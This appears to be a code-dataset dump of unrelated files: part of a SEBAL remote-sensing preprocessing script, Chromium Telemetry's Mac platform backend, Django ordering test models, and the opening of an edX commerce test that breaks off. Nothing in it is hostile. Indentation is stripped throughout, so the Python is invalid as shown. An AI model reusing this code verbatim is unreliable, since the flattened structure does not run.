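# 6 / 10 = 0.6 > 0.5 and is kept as water in the end mask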
# Save water mask
WaterMask_outfolder_end_FileName = os.path.join(WaterMask_outfolder_end,'Water_Mask.tif')
SEBAL.save_GeoTiff_proy(dest, water_mask_array_end, WaterMask_outfolder_end_FileName, shape, nband=1)
######################## calculate p-factor by using the Landuse map #########################
ws_p = wb_veg['p-factor']
Array_P = np.zeros([ws_p.max_row-1,2])
for j in ['A','C']:
j_number={'A' : 0, 'C' : 1}
for i in range(2,ws_p.max_row+1):
Value = (ws_p['%s%s' %(j,i)].value)
Array_P[i-2, j_number[j]] = Value
p_factor = np.zeros([int(np.shape(LU_data)[0]),int(np.shape(LU_data)[1])])
for Class in range(0,len(Array_P)):
p_factor[LU_data==Array_P[Class,0]] = Array_P[Class,1]
p_factor[p_factor == 0] = 0.5
dst_FileName = os.path.join(temp_folder_PreSEBAL, 'p-factor_proj.tif')
SEBAL.save_GeoTiff_proy(dest1, p_factor, dst_FileName, shape_data, nband=1)
dest, ulx, lry, lrx, uly, epsg_to = SEBAL.reproject_dataset_example(dst_FileName, LAI_FileName)
band_data = dest.GetRasterBand(1) # Get the reprojected dem band
ncol_data = dest.RasterXSize
nrow_data = dest.RasterYSize
p_factor = band_data.ReadAsArray(0, 0, ncol_data, nrow_data)
p_factor[p_factor == 0] = 0.5
dst_pfactor_FileName = os.path.join(output_folder_p_factor,'p_factor.tif')
SEBAL.save_GeoTiff_proy(dest, p_factor, dst_pfactor_FileName, shape, nband=1)
######################## calculate c-factor by using the Landuse map #########################
ws_c = wb_veg['C-factor']
Array_C = np.zeros([ws_c.max_row-1,2])
for j in ['A','C']:
j_number={'A' : 0, 'C' : 1}
for i in range(2,ws_c.max_row+1):
Value = (ws_c['%s%s' %(j,i)].value)
Array_C[i-2, j_number[j]] = Value
c_factor = np.zeros([int(np.shape(LU_data)[0]),int(np.shape(LU_data)[1])])
for Class in range(0,len(Array_C)):
c_factor[LU_data==Array_C[Class,0]] = Array_C[Class,1]
c_factor[np.logical_and(c_factor != 3.0, c_factor != 4.0)] = np.nan
LUE_max = np.zeros([int(np.shape(LU_data)[0]),int(np.shape(LU_data)[1])])
LUE_max[c_factor == 3] = 2.5
LUE_max[c_factor == 4] = 4.5
LUE_max[LUE_max == 0] = 2.5
dst_FileName = os.path.join(temp_folder_PreSEBAL, 'LUE_max_proj.tif')
SEBAL.save_GeoTiff_proy(dest1, LUE_max, dst_FileName, shape_data, nband=1)
dest, ulx, lry, lrx, uly, epsg_to = SEBAL.reproject_dataset_example(dst_FileName, LAI_FileName)
band_data = dest.GetRasterBand(1) # Get the reprojected dem band
ncol_data = dest.RasterXSize
nrow_data = dest.RasterYSize
LUE_max = band_data.ReadAsArray(0, 0, ncol_data, nrow_data)
LUE_max[LUE_max == 0] = 2.5
dst_LUEmax_FileName = os.path.join(output_folder_LUE,'LUE_max.tif')
SEBAL.save_GeoTiff_proy(dest, LUE_max, dst_LUEmax_FileName, shape, nband=1)
####################################################################################################################
################################################ Write output part 6 ###############################################
####################################################################################################################
############################################# Fill in the additional input sheet #########################################
# things to be filled in:
# Transmissivity (optional)
# NDVI (additional input)
# Albedo (additional input)
# LST (additional input)
# Water Mask (additional input)
# p-factor (soil input)
# c-factor (soil input)
# Vegetation height (meteo input)
# VIIRS parameter copy
VIIRS_Dict = {}
for k, v in SEBAL_RUNS.iteritems():
VIIRS_Dict.setdefault(v['output_folder'], []).append(k)
'''
LST folder = output_folder_HANTS_end
NDVI folder = os.path.join(output_folder_HANTS, 'NDVI')
ALBEDO folder = os.path.join(output_folder_HANTS, 'Albedo')
SAVI folder = os.path.join(output_folder_HANTS, 'SAVI')
'''
VARS = ["NDVI", "Albedo"]
Letter_dict = {"NDVI":'B', "Albedo":'D'}
xfile = load_workbook(inputExcel)
sheet_additional = xfile.get_sheet_by_name('Additional_Input')
sheet_meteo = xfile.get_sheet_by_name('Meteo_Input')
sheet_soil = xfile.get_sheet_by_name('Soil_Input')
sheet_out_name = ''.join([os.path.splitext(os.path.basename(inputExcel))[0],'_SEBAL.xlsx'])
sheet_out_dir = os.path.dirname(inputExcel)
sheet_out_file_name = os.path.join(sheet_out_dir, sheet_out_name)
for output_name_run in VIIRS_Dict.keys():
# Get General parameters
Row_number = VIIRS_Dict[output_name_run][0]
Type_of_Run = SEBAL_RUNS.items()
VIIRS_date = output_name_run.split('_')[-1]
VIIRS_datetime= datetime.strptime(VIIRS_date, '%d%m%Y')
date_run = '%d%02d%02d' %(VIIRS_datetime.year,VIIRS_datetime.month,VIIRS_datetime.day)
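# e.g. a run folder ending in '_21062016' (a hypothetical name) parses to
# VIIRS_datetime 2016-06-21 and date_run '20160621'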
# import LST
file_name_LST = os.path.join(output_folder_HANTS_end_sharp, 'LST_surface_temp_sharpened_%s.tif' %date_run )
sheet_additional['E%d'%(Row_number)] = str(file_name_LST)
# import NDVI and Albedo and water mask
for VAR_SINGLE in VARS:
Letter = Letter_dict[VAR_SINGLE]
file_name_VAR_single = os.path.join(output_folder_PreSEBAL, VAR_SINGLE, '%s_PROBAV_%s.tif' %(VAR_SINGLE, date_run))
sheet_additional['%s%d'%(Letter, Row_number)] = str(file_name_VAR_single)
# import Water Mask
sheet_additional['C%d'%(Row_number)] = str(WaterMask_outfolder_end_FileName)
# import p-factor
file_name_p_factor = os.path.join(output_folder_p_factor,'p_factor.tif')
sheet_soil['H%d'%(Row_number)] = str(file_name_p_factor)
# import c-factor (LUE max)
file_name_c_factor = os.path.join(output_folder_LUE, 'LUE_max.tif')
sheet_soil['I%d'%(Row_number)] = str(file_name_c_factor)
# import vegetation height
file_name_vegt_height = os.path.join(output_folder_HANTS_end_Veg,'Vegetation_Height_%s.tif' %date_run)
sheet_meteo['O%d'%(Row_number)] = str(file_name_vegt_height)
xfile.save(sheet_out_file_name)
'''
# If instantanious Transmissivity is calculated in PreSEBAL
if Check_Trans_inst == 1:
sheet['N%d'%(number)] = str(Transmissivity_inst_fileName)
xfile.save(inputExcel)
# If daily Transmissivity is calculated in PreSEBAL
if Check_Trans_24 == 1:
sheet_meteo['K%d'%(number)] = str(Transmissivity_24_fileName)
xfile.save(sheet_out_file_name)
'''
'''
############################################# Create Outlier maps for PROBA-V #########################################
# Create output folder if not exists
output_folder_HANTS_outliers = os.path.join(output_folder_HANTS, 'Outliers')
if not os.path.exists(output_folder_HANTS_outliers):
os.mkdir(output_folder_HANTS_outliers)
fh = Dataset(nc_path_albedo, mode='r')
Var = fh.variables.keys()[-1]
data = fh.variables['outliers'][:]
lat = fh.variables[fh.variables.keys()[1]][:]
lon = fh.variables[fh.variables.keys()[2]][:]
time = fh.variables[fh.variables.keys()[3]][:]
minimum_lon = np.min(lon)
maximum_lat = np.max(lat)
diff_lon = lon[1] - lon[0]
diff_lat = lat[1] - lat[0]
if not ('shape' in locals() or 'dest' in locals()):
Example_file = os.path.join(output_folder_preprocessing_VAR,Back_name)
dest = gdal.Open(Example_file)
ncol = dest.RasterXSize # Get the reprojected dem column size
nrow = dest.RasterYSize # Get the reprojected dem row size
shape=[ncol, nrow]
for i in range(0,int(np.shape(data)[2])):
time_now = time[i]
data_now = data[:,:,i]
geo = tuple([minimum_lon, diff_lon, 0, maximum_lat, 0, diff_lat])
name_out = os.path.join(output_folder_HANTS_outliers, 'Outliers_PROBAV_%s.tif' %time_now)
SEBAL.save_GeoTiff_proy(dest, data_now, name_out, shape, nband=1)
############################################ NDVI ##################################################
# Create output folder if not exists
output_folder_HANTS_outliers = os.path.join(output_folder_HANTS, 'Outliers_NDVI')
if not os.path.exists(output_folder_HANTS_outliers):
os.mkdir(output_folder_HANTS_outliers)
fh = Dataset(nc_path_ndvi, mode='r')
Var = fh.variables.keys()[-1]
data = fh.variables['outliers'][:]
lat = fh.variables[fh.variables.keys()[1]][:]
lon = fh.variables[fh.variables.keys()[2]][:]
time = fh.variables[fh.variables.keys()[3]][:]
minimum_lon = np.min(lon)
maximum_lat = np.max(lat)
diff_lon = lon[1] - lon[0]
diff_lat = lat[1] - lat[0]
if not ('shape' in locals() or 'dest' in locals()):
Example_file = os.path.join(output_folder_preprocessing_VAR,Back_name)
dest = gdal.Open(Example_file)
ncol = dest.RasterXSize # Get the reprojected dem column size
nrow = dest.RasterYSize # Get the reprojected dem row size
shape=[ncol, nrow]
for i in range(0,int(np.shape(data)[2])):
time_now = time[i]
data_now = data[:,:,i]
geo = tuple([minimum_lon, diff_lon, 0, maximum_lat, 0, diff_lat])
name_out = os.path.join(output_folder_HANTS_outliers, 'Outliers_PROBAV_%s.tif' %time_now)
SEBAL.save_GeoTiff_proy(dest, data_now, name_out, shape, nband=1)
###################################################### postHANTS Albedo ###############################################
for date in Dates:
year = date.year
month = date.month
day = date.day
filename_outliers = r"G:\SEBAL_Tadla\PROBAV-VIIRS\HANTS_output\Outliers\Outliers_PROBAV_%d%02d%02d.tif" %(year,month,day)
filename_VIIRS_original = r"G:\SEBAL_Tadla\PROBAV-VIIRS\HANTS_input\Albedo\Albedo_PROBAV_%d%02d%02d.tif" %(year,month,day)
filename_VIIRS_HANTS = r"G:\SEBAL_Tadla\PROBAV-VIIRS\HANTS_output\Albedo\Albedo_PROBAV_%d%02d%02d.tif"%(year,month,day)
dest_outliers = gdal.Open(filename_outliers)
dest_VIIRS_original = gdal.Open(filename_VIIRS_original)
dest_VIIRS_HANTS = gdal.Open(filename_VIIRS_HANTS)
if not dest_VIIRS_original == None:
Array_outliers = dest_outliers.GetRasterBand(1).ReadAsArray()[:,:]
Array_VIIRS_original = dest_VIIRS_original.GetRasterBand(1).ReadAsArray()
Array_VIIRS_HANTS = dest_VIIRS_HANTS.GetRasterBand(1).ReadAsArray()[:,:]
Array_outliers[Array_outliers==-9999.] = 0
Array_outliers_mask = np.zeros(np.shape(Array_outliers))
Array_outliers_mask[Array_outliers==1.]=0
Array_outliers_mask[Array_outliers==0.]=1
Array_outliers_mask[Array_outliers_mask==0]=2
Array_outliers_mask[Array_outliers_mask==1]=0
Array_outliers_mask[Array_outliers_mask==2]=1
Array_outliers_mask = Create_Buffer(Array_outliers_mask)
Array_outliers_mask[Array_outliers_mask==1] = 2
Array_outliers_mask[Array_outliers_mask==0] = 1
Array_outliers_mask[Array_outliers_mask==2] = 0
if np.nansum(Array_outliers_mask) > 30:
Array_outliers_mask[Array_VIIRS_HANTS == 0] = np.nan
Array_VIIRS_original_mask_nan = Array_VIIRS_original * Array_outliers_mask
Array_VIIRS_HANTS_mask_nan = Array_VIIRS_HANTS * Array_outliers_mask
Array_VIIRS_original_mask_nan_flatten = Array_VIIRS_original_mask_nan.flatten()
Array_VIIRS_HANTS_mask_nan_flatten = Array_VIIRS_HANTS_mask_nan.flatten()
Array_VIIRS_original_mask_nan_flatten = Array_VIIRS_original_mask_nan_flatten[~np.isnan(Array_VIIRS_original_mask_nan_flatten)]
Array_VIIRS_HANTS_mask_nan_flatten = Array_VIIRS_HANTS_mask_nan_flatten[~np.isnan(Array_VIIRS_HANTS_mask_nan_flatten)]
Array_VIIRS_original_mask_nan_flatten_without_zero =Array_VIIRS_original_mask_nan_flatten[Array_VIIRS_original_mask_nan_flatten>0]
Array_VIIRS_original_mask_value_cold = np.percentile(Array_VIIRS_original_mask_nan_flatten_without_zero,40)
Array_VIIRS_original_mask_value_hot = np.percentile(Array_VIIRS_original_mask_nan_flatten_without_zero,90)
Array_VIIRS_HANTS_mask_nan_flatten_exc_coldest = Array_VIIRS_HANTS_mask_nan_flatten[np.logical_and(Array_VIIRS_original_mask_nan_flatten > Array_VIIRS_original_mask_value_cold,Array_VIIRS_original_mask_nan_flatten < Array_VIIRS_original_mask_value_hot)]
Array_VIIRS_original_mask_nan_flatten_exc_coldest = Array_VIIRS_original_mask_nan_flatten[np.logical_and(Array_VIIRS_original_mask_nan_flatten > Array_VIIRS_original_mask_value_cold,Array_VIIRS_original_mask_nan_flatten < Array_VIIRS_original_mask_value_hot)]
Array_VIIRS_HANTS_mask_nan_flatten_exc_coldest[Array_VIIRS_HANTS_mask_nan_flatten_exc_coldest==-9999] = np.nan
Array_VIIRS_original_mask_nan_flatten_exc_coldest[Array_VIIRS_original_mask_nan_flatten_exc_coldest==-9999] = np.nan
Ave_VIIRS_HANTS = np.nanmean(Array_VIIRS_HANTS_mask_nan_flatten_exc_coldest)
Ave_VIIRS_original = np.nanmean(Array_VIIRS_original_mask_nan_flatten_exc_coldest)
Factor = Ave_VIIRS_original/Ave_VIIRS_HANTS
Array_VIIRS_HANTS_Corrected = Array_VIIRS_HANTS * Factor
End_array = np.ones(np.shape(Array_outliers_mask)) * np.nan
End_array[Array_outliers_mask==0] =Array_VIIRS_HANTS_Corrected[Array_outliers_mask==0]
End_array[Array_outliers_mask==1] =Array_VIIRS_original[Array_outliers_mask==1]
else:
End_array = Array_VIIRS_HANTS
geo = dest_VIIRS_original.GetGeoTransform()
proj = dest_outliers.GetProjection()
else:
Array_VIIRS_HANTS = dest_VIIRS_HANTS.GetRasterBand(1).ReadAsArray()
End_array = Array_VIIRS_HANTS
dest_test = None
i = 0
while dest_test == None:
date2 = Dates[i]
year2 = date2.year
month2= date2.month
day2 = date2.day
try:
filename_VIIRS_original2 = r"G:\SEBAL_Tadla\PROBAV-VIIRS\HANTS_input\Albedo\Albedo_PROBAV_%d%02d%02d.tif" %(year2,month2,day2)
dest_test = gdal.Open(filename_VIIRS_original2)
geo = dest_test.GetGeoTransform()
proj = dest_test.GetProjection()
except:
i+=1
import wa.General.data_conversions as DC
name = r"G:\SEBAL_Tadla\PROBAV-VIIRS\HANTS_end\Albedo\Albedo_PROBAV_%d%02d%02d.tif"%(year,month,day)
DC.Save_as_tiff(name, End_array, geo, proj)
################################## All input is now calculated, so preprosessing can start ########################
# Open the Vegetation_Height sheet of the preprocessing excel file
ws_veg = wb_veg['Vegetation_Height']
# Define output name for the LandUse map
dst_FileName = os.path.join(output_folder,'LU_%s.tif' %Var_name)
# Open LU data
LU_dest = gdal.Open(LU_data_FileName)
LU_data = LU_dest.GetRasterBand(1).ReadAsArray()
# Reproject the LAI to the same projection as LU
dest1, ulx, lry, lrx, uly, epsg_to = SEBAL.reproject_dataset_example(LAI_FileName, LU_data_FileName) ## input after HANTS
LAI_proj = dest1.GetRasterBand(1).ReadAsArray()
# Read out the excel file coefficient numbers
Array = np.zeros([ws_veg.max_row-1,4])
for j in ['A','C','D','E']:
j_number={'A' : 0, 'C' : 1, 'D' : 2, 'E' : 3}
for i in range(2,ws_veg.max_row+1):
Value = (ws_veg['%s%s' %(j,i)].value)
Array[i-2, j_number[j]] = Value
# Create maps with the coefficient numbers for the right land cover
coeff = np.zeros([int(np.shape(LU_data)[0]),int(np.shape(LU_data)[1]),3])
for coeff_nmbr in range(0,3):
for Class in range(0,len(Array)):
coeff[LU_data==Array[Class,0],coeff_nmbr] = Array[Class,coeff_nmbr+1]
# Get some dimensions of the projected dataset
band_data = dest1.GetRasterBand(1)
ncol_data = dest1.RasterXSize
nrow_data = dest1.RasterYSize
shape_data=[ncol_data, nrow_data]
# Calculate the vegetation height in the LU projection
Veg_Height_proj = coeff[:,:,0] * np.power(LAI_proj,2) + coeff[:,:,1] * LAI_proj + coeff[:,:,2]
Veg_Height_proj = np.clip(Veg_Height_proj, 0, 600)
# Save the vegetation height in the LU projection in the temporary directory
Veg_Height_proj_FileName = os.path.join(output_folder_temp,'Veg_Height_proj.tif')
save_GeoTiff_proy(dest1, Veg_Height_proj, Veg_Height_proj_FileName, shape_data, nband=1)
# Reproject the Veg_height to the LAI projection
dest, ulx, lry, lrx, uly, epsg_to = SEBAL.reproject_dataset_example(Veg_Height_proj_FileName, LAI_FileName)
# Get some dimensions of the original dataset
band_data = dest.GetRasterBand(1)
ncol_data = dest.RasterXSize
nrow_data = dest.RasterYSize
# Open the Veg_height with the same projection as LAI
Veg_Height = band_data.ReadAsArray(0, 0, ncol_data, nrow_data)
Veg_Height[Veg_Height == 0] = np.nan
# Save Vegetation Height in the end folder
dst_FileName = os.path.join(output_folder,'Vegetation_Height_%s.tif' %Var_name)
save_GeoTiff_proy(dest, Veg_Height, dst_FileName, shape, nband=1)
######################## calculate p-factor by using the Landuse map #########################
ws_p = wb_veg['p-factor']
Array_P = np.zeros([ws_p.max_row-1,2])
for j in ['A','C']:
j_number={'A' : 0, 'C' : 1}
for i in range(2,ws_p.max_row+1):
Value = (ws_p['%s%s' %(j,i)].value)
Array_P[i-2, j_number[j]] = Value
p_factor = np.zeros([int(np.shape(LU_data)[0]),int(np.shape(LU_data)[1])])
for Class in range(0,len(Array_P)):
p_factor[LU_data==Array_P[Class,0]] = Array_P[Class,1]
p_factor[p_factor == 0] = np.nan
dst_FileName = os.path.join(output_folder_temp,'p-factor_proj.tif')
save_GeoTiff_proy(dest1, p_factor, dst_FileName, shape_data, nband=1)
dest, ulx, lry, lrx, uly, epsg_to = SEBAL.reproject_dataset_example(dst_FileName, LAI_FileName)
band_data = dest.GetRasterBand(1) # Get the reprojected dem band
ncol_data = dest.RasterXSize
nrow_data = dest.RasterYSize
p_factor = band_data.ReadAsArray(0, 0, ncol_data, nrow_data)
p_factor[p_factor == 0] = np.nan
dst_pfactor_FileName = os.path.join(output_folder,'p-factor_%s.tif' %Var_name)
save_GeoTiff_proy(dest, p_factor, dst_pfactor_FileName, shape, nband=1)
######################## calculate c-factor by using the Landuse map #########################
ws_c = wb_veg['C-factor']
Array_C = np.zeros([ws_c.max_row-1,2])
for j in ['A','C']:
j_number={'A' : 0, 'C' : 1}
for i in range(2,ws_c.max_row+1):
Value = (ws_c['%s%s' %(j,i)].value)
Array_C[i-2, j_number[j]] = Value
c_factor = np.zeros([int(np.shape(LU_data)[0]),int(np.shape(LU_data)[1])])
for Class in range(0,len(Array_C)):
c_factor[LU_data==Array_C[Class,0]] = Array_C[Class,1]
c_factor[np.logical_and(c_factor != 3.0, c_factor != 4.0)] = np.nan
LUE_max = np.zeros([int(np.shape(LU_data)[0]),int(np.shape(LU_data)[1])])
LUE_max[c_factor == 3] = 2.5
LUE_max[c_factor == 4] = 4.5
LUE_max[LUE_max == 0] = np.nan
dst_FileName = os.path.join(output_folder_temp,'LUE_max_proj.tif')
save_GeoTiff_proy(dest1, LUE_max, dst_FileName, shape_data, nband=1)
dest, ulx, lry, lrx, uly, epsg_to = SEBAL.reproject_dataset_example(dst_FileName, LAI_FileName)
band_data = dest.GetRasterBand(1) # Get the reprojected dem band
ncol_data = dest.RasterXSize
nrow_data = dest.RasterYSize
LUE_max = band_data.ReadAsArray(0, 0, ncol_data, nrow_data)
LUE_max[LUE_max == 0] = np.nan
dst_LUEmax_FileName = os.path.join(output_folder,'LUE_max_%s.tif' %Var_name)
save_GeoTiff_proy(dest, LUE_max, dst_LUEmax_FileName, shape, nband=1)
############################# delete temporary directory ########################
shutil.rmtree(output_folder_temp)
#################################################################################
'''
# Functions
#################################################################################
def Create_Buffer(Data_In):
'''
This function buffers (dilates) a binary mask: a square block of roughly
(2 * Buffer_area + 1) pixels on a side around every pixel with value 1 is set to 1
'''
Buffer_area = 7 # Half-width of the square buffer block
Data_Out=np.empty((len(Data_In),len(Data_In[1])))
Data_Out[:,:] = Data_In
for ypixel in range(0,Buffer_area + 1):
for xpixel in range(1,Buffer_area + 1):
if ypixel==0:
for xpixel in range(1,Buffer_area + 1):
Data_Out[:,0:-xpixel] += Data_In[:,xpixel:]
Data_Out[:,xpixel:] += Data_In[:,:-xpixel]
for ypixel in range(1,Buffer_area + 1):
Data_Out[ypixel:,:] += Data_In[:-ypixel,:]
Data_Out[0:-ypixel,:] += Data_In[ypixel:,:]
else:
Data_Out[0:-xpixel,ypixel:] += Data_In[xpixel:,:-ypixel]
Data_Out[xpixel:,ypixel:] += Data_In[:-xpixel,:-ypixel]
Data_Out[0:-xpixel,0:-ypixel] += Data_In[xpixel:,ypixel:]
Data_Out[xpixel:,0:-ypixel] += Data_In[:-xpixel,ypixel:]
Data_Out[Data_Out>0.1] = 1
Data_Out[Data_Out<=0.1] = 0
return(Data_Out)
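# Usage sketch (hypothetical input): a single flagged pixel grows into a
# filled block of ones of roughly (2 * Buffer_area + 1) pixels on a side:
# mask = np.zeros((30, 30)); mask[15, 15] = 1
# buffered = Create_Buffer(mask)   # buffered[15, 15] == 1.0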
#------------------------------------------------------------------------------
def Get_epsg(g):
try:
# Get info of the dataset that is used for transforming
gland_proj = g.GetProjection()
Projection=gland_proj.split('EPSG","')
epsg_to=int((str(Projection[-1]).split(']')[0])[0:-1])
except:
epsg_to=4326
print('Was not able to get the projection, so WGS84 is assumed')
return(epsg_to)
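# A more robust alternative (a sketch, assuming GDAL's osr bindings are
# available) would let osr parse the WKT instead of splitting strings:
# from osgeo import osr
# srs = osr.SpatialReference(wkt=g.GetProjection())
# epsg_to = int(srs.GetAttrValue('AUTHORITY', 1))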
#------------------------------------------------------------------------------
def gap_filling(data,NoDataValue):
"""
This function fills the no data gaps in a numpy array
Keyword arguments:
data -- Array with no data gaps
NoDataValue -- Value that must be filled
"""
# fill the no data values
if NoDataValue is np.nan:
mask = ~(np.isnan(data))
else:
mask = ~(data==NoDataValue)
xx, yy = np.meshgrid(np.arange(data.shape[1]), np.arange(data.shape[0]))
xym = np.vstack( (np.ravel(xx[mask]), np.ravel(yy[mask])) ).T
data0 = np.ravel( data[:,:][mask] )
interp0 = scipy.interpolate.NearestNDInterpolator( xym, data0 )
data_end = interp0(np.ravel(xx), np.ravel(yy)).reshape( xx.shape )
return (data_end)
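# Usage sketch: fill -9999 gaps in an array with the nearest valid neighbour
# (assumes at least one valid pixel exists, otherwise the interpolator cannot
# be built):
# dem_filled = gap_filling(dem_array, -9999)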
#------------------------------------------------------------------------------
if __name__ == '__main__':
main()
|
apache-2.0
|
benschmaus/catapult
|
telemetry/telemetry/internal/platform/mac_platform_backend.py
|
1
|
7073
|
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import ctypes
import ctypes.util
import os
import platform
import subprocess
import sys
import time
from telemetry.core import os_version as os_version_module
from telemetry import decorators
from telemetry.internal.platform import posix_platform_backend
from telemetry.internal.platform.power_monitor import powermetrics_power_monitor
from telemetry.util import process_statistic_timeline_data
try:
import resource # pylint: disable=import-error
except ImportError:
resource = None # Not available on all platforms
class MacPlatformBackend(posix_platform_backend.PosixPlatformBackend):
def __init__(self):
super(MacPlatformBackend, self).__init__()
self.libproc = None
self._power_monitor = powermetrics_power_monitor.PowerMetricsPowerMonitor(
self)
def GetSystemLog(self):
# Since the log file can be very large, only show the last 200 lines.
return subprocess.check_output(
['tail', '-n', '200', '/var/log/system.log'])
@classmethod
def IsPlatformBackendForHost(cls):
return sys.platform == 'darwin'
def IsThermallyThrottled(self):
raise NotImplementedError()
def HasBeenThermallyThrottled(self):
raise NotImplementedError()
def _GetIdleWakeupCount(self, pid):
top_output = self._GetTopOutput(pid, ['idlew'])
# Sometimes top won't return anything here, just ignore such cases -
# crbug.com/354812 .
if top_output[-2] != 'IDLEW':
return process_statistic_timeline_data.IdleWakeupTimelineData(pid, 0)
# Numbers reported by top may have a '+' appended.
wakeup_count = int(top_output[-1].strip('+ '))
return process_statistic_timeline_data.IdleWakeupTimelineData(pid,
wakeup_count)
def GetCpuStats(self, pid):
"""Returns a dict of cpu statistics for the process represented by |pid|."""
class ProcTaskInfo(ctypes.Structure):
"""Struct for proc_pidinfo() call."""
_fields_ = [("pti_virtual_size", ctypes.c_uint64),
("pti_resident_size", ctypes.c_uint64),
("pti_total_user", ctypes.c_uint64),
("pti_total_system", ctypes.c_uint64),
("pti_threads_user", ctypes.c_uint64),
("pti_threads_system", ctypes.c_uint64),
("pti_policy", ctypes.c_int32),
("pti_faults", ctypes.c_int32),
("pti_pageins", ctypes.c_int32),
("pti_cow_faults", ctypes.c_int32),
("pti_messages_sent", ctypes.c_int32),
("pti_messages_received", ctypes.c_int32),
("pti_syscalls_mach", ctypes.c_int32),
("pti_syscalls_unix", ctypes.c_int32),
("pti_csw", ctypes.c_int32),
("pti_threadnum", ctypes.c_int32),
("pti_numrunning", ctypes.c_int32),
("pti_priority", ctypes.c_int32)]
PROC_PIDTASKINFO = 4
def __init__(self):
self.size = ctypes.sizeof(self)
super(ProcTaskInfo, self).__init__() # pylint: disable=bad-super-call
proc_info = ProcTaskInfo()
if not self.libproc:
self.libproc = ctypes.CDLL(ctypes.util.find_library('libproc'))
self.libproc.proc_pidinfo(pid, proc_info.PROC_PIDTASKINFO, 0,
ctypes.byref(proc_info), proc_info.size)
# Convert nanoseconds to seconds.
cpu_time = (proc_info.pti_total_user / 1000000000.0 +
proc_info.pti_total_system / 1000000000.0)
results = {'CpuProcessTime': cpu_time,
'ContextSwitches': proc_info.pti_csw}
# top only reports idle wakeup count starting from OS X 10.9.
if self.GetOSVersionName() >= os_version_module.MAVERICKS:
results.update({'IdleWakeupCount': self._GetIdleWakeupCount(pid)})
return results
def GetCpuTimestamp(self):
"""Return current timestamp in seconds."""
return {'TotalTime': time.time()}
def GetSystemCommitCharge(self):
vm_stat = self.RunCommand(['vm_stat'])
for stat in vm_stat.splitlines():
key, value = stat.split(':')
if key == 'Pages active':
pages_active = int(value.strip()[:-1]) # Strip trailing '.'
return pages_active * resource.getpagesize() / 1024
return 0
@decorators.Cache
def GetSystemTotalPhysicalMemory(self):
return int(self.RunCommand(['sysctl', '-n', 'hw.memsize']))
def PurgeUnpinnedMemory(self):
# TODO(pliard): Implement this.
pass
@decorators.Deprecated(
2017, 11, 4,
'Clients should use tracing and memory-infra in new Telemetry '
'benchmarks. See for context: https://crbug.com/632021')
def GetMemoryStats(self, pid):
rss_vsz = self.GetPsOutput(['rss', 'vsz'], pid)
if rss_vsz:
rss, vsz = rss_vsz[0].split()
return {'VM': 1024 * int(vsz),
'WorkingSetSize': 1024 * int(rss)}
return {}
@decorators.Cache
def GetArchName(self):
return platform.machine()
def GetOSName(self):
return 'mac'
@decorators.Cache
def GetOSVersionName(self):
os_version = os.uname()[2]
if os_version.startswith('9.'):
return os_version_module.LEOPARD
if os_version.startswith('10.'):
return os_version_module.SNOWLEOPARD
if os_version.startswith('11.'):
return os_version_module.LION
if os_version.startswith('12.'):
return os_version_module.MOUNTAINLION
if os_version.startswith('13.'):
return os_version_module.MAVERICKS
if os_version.startswith('14.'):
return os_version_module.YOSEMITE
if os_version.startswith('15.'):
return os_version_module.ELCAPITAN
if os_version.startswith('16.'):
return os_version_module.SIERRA
raise NotImplementedError('Unknown mac version %s.' % os_version)
@decorators.Cache
def GetOSVersionDetailString(self):
product = subprocess.check_output(['sw_vers', '-productVersion']).strip()
build = subprocess.check_output(['sw_vers', '-buildVersion']).strip()
return product + ' ' + build
def CanTakeScreenshot(self):
return True
def TakeScreenshot(self, file_path):
return subprocess.call(['screencapture', file_path])
def CanFlushIndividualFilesFromSystemCache(self):
return False
def SupportFlushEntireSystemCache(self):
return self.HasRootAccess()
def FlushEntireSystemCache(self):
mavericks_or_later = self.GetOSVersionName() >= os_version_module.MAVERICKS
p = self.LaunchApplication('purge', elevate_privilege=mavericks_or_later)
p.communicate()
assert p.returncode == 0, 'Failed to flush system cache'
def CanMonitorPower(self):
return self._power_monitor.CanMonitorPower()
def CanMeasurePerApplicationPower(self):
return self._power_monitor.CanMeasurePerApplicationPower()
def StartMonitoringPower(self, browser):
self._power_monitor.StartMonitoringPower(browser)
def StopMonitoringPower(self):
return self._power_monitor.StopMonitoringPower()
|
bsd-3-clause
|
akintoey/django
|
tests/ordering/models.py
|
261
|
1379
|
"""
Specifying ordering
Specify default ordering for a model using the ``ordering`` attribute, which
should be a list or tuple of field names. This tells Django how to order
``QuerySet`` results.
If a field name in ``ordering`` starts with a hyphen, that field will be
ordered in descending order. Otherwise, it'll be ordered in ascending order.
The special-case field name ``"?"`` specifies random order.
The ordering attribute is not required. If you leave it off, ordering will be
undefined -- not random, just undefined.
"""
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
class Author(models.Model):
class Meta:
ordering = ('-pk',)
@python_2_unicode_compatible
class Article(models.Model):
author = models.ForeignKey(Author, models.SET_NULL, null=True)
second_author = models.ForeignKey(Author, models.SET_NULL, null=True)
headline = models.CharField(max_length=100)
pub_date = models.DateTimeField()
class Meta:
ordering = ('-pub_date', 'headline')
def __str__(self):
return self.headline
class OrderedByAuthorArticle(Article):
class Meta:
proxy = True
ordering = ('author', 'second_author')
class Reference(models.Model):
article = models.ForeignKey(OrderedByAuthorArticle, models.CASCADE)
class Meta:
ordering = ('article',)
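# A minimal usage sketch (illustrative only, not part of the original test
# models; assumes a populated database):
def example_ordering_queries():
    # Default ordering from Meta: newest pub_date first, then headline.
    newest_first = Article.objects.all()
    # A per-query order_by() overrides the model's default ordering.
    oldest_first = Article.objects.order_by('pub_date')
    # The special-case '?' orders randomly; a '-' prefix reverses a field.
    random_order = Article.objects.order_by('?')
    return newest_first, oldest_first, random_order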
|
bsd-3-clause
|
fintech-circle/edx-platform
|
lms/djangoapps/commerce/tests/test_utils.py
|
1
|
4317
|
"""Tests of commerce utilities."""
from django.conf import settings
from django.test import TestCase
from django.test.client import RequestFactory
from django.test.utils import override_settings
from mock import patch
from waffle.testutils import override_switch
from commerce.models import CommerceConfiguration
from commerce.utils import EcommerceService
from openedx.core.lib.log_utils import audit_log
from openedx.core.djangoapps.site_configuration.tests.test_util import with_site_configuration
from student.tests.factories import UserFactory
def update_commerce_config(enabled=False, checkout_page='/test_basket/'):
""" Enable / Disable CommerceConfiguration model """
CommerceConfiguration.objects.create(
checkout_on_ecommerce_service=enabled,
single_course_checkout_page=checkout_page,
)
class AuditLogTests(TestCase):
"""Tests of the commerce audit logging helper."""
@patch('openedx.core.lib.log_utils.log')
def test_log_message(self, mock_log):
"""Verify that log messages are constructed correctly."""
